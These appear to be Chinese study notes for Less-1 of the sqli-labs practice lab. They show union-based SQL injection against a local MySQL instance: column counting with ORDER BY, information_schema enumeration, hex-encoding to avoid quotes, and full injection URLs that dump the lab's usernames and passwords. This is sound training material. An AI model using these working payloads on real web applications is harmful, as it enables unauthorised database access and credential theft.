查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema='库名'(当前库可写为 table_schema=database())
查列:select column_name from information_schema.columns where table_name='表名'
Less ONE
SELECT * FROM users LIMIT 0,1;
其中 LIMIT 的第一个参数是起始偏移量(0 表示从第一行开始),第二个参数是返回的行数(1 表示只显示一条数据)
SELECT * FROM users WHERE id='1' or 1=1 -- ' LIMIT 0,1
`--+`(`+` 用来拼接出 `--` 后面所需的空格)、`-- `、`#` 都是注释符
order by num 表示对第 num 列进行排序;依次尝试不同的 num 值,可用来查看查询结果有多少列
用二分法猜解出 Less-1 的查询结果存在三列
order by 5 --> order by 3 correct
查看哪些数据可以回显
mysql> SELECT * FROM users WHERE id='-1' union select 1,2,3 -- ' LIMIT 0,1
-> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)
基本查询函数
mysql> select system_user(); 用户查询
+----------------+
| system_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select current_user();
+----------------+
| current_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select databases;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'databases' at line 1
mysql> select database(); 当前数据库查询
+------------+
| database() |
+------------+
| security |
+------------+
1 row in set (0.00 sec)
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.00 sec)
mysql> select @@datadir; 数据存放路径
+-------------------------------------+
| @@datadir |
+-------------------------------------+
| D:\phpStudy\PHPTutorial\MySQL\data\ |
+-------------------------------------+
1 row in set (0.00 sec)
mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Win32 |
+----------------------+
1 row in set (0.00 sec)
mysql> select @@basedir; 安装路径
+--------------------------------+
| @@basedir |
+--------------------------------+
| D:/phpStudy/PHPTutorial/MySQL/ |
+--------------------------------+
1 row in set (0.00 sec)
group_concat()函数
mysql> select group_concat(password) from users;
+--------------------------------------------------------------------------------------------------+
| group_concat(password) |
+--------------------------------------------------------------------------------------------------+
| Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4 |
+--------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
concat_ws('~',A,B)
效果 A~B
concat函数讲解blog.csdn.net/qq_35211818…
SOS:避免在注入语句中使用单引号的方法
进行HEX编码
eg:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users limit 0,1 --+
-->
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users limit 0,1 --+
Conclusion
查询所有数据库
mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name |
+--------------------+
| information_schema |
| bus |
| business |
| challenges |
| dvwa |
| emlog |
| mysql |
| performance_schema |
| security |
| test |
+--------------------+
10 rows in set (0.00 sec)
查询库中所有表名
mysql> select table_name from information_schema.tables where table_schema='security';
+------------+
| table_name |
+------------+
| emails |
| referers |
| uagents |
| users |
+------------+
实战中记得避免在查询语句中出现单引号,进行hex编码
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479-- ' LIMIT 0,1
'security' --> 0x + hex('security') = 0x7365637572697479
查询表中所有列名
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273-- ' LIMIT 0,1
查询列中信息
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from users -- ' LIMIT 0,1
mysql> select group_concat(concat_ws('~',username,password)) from users;
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| group_concat(concat_ws('~',username,password)) |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)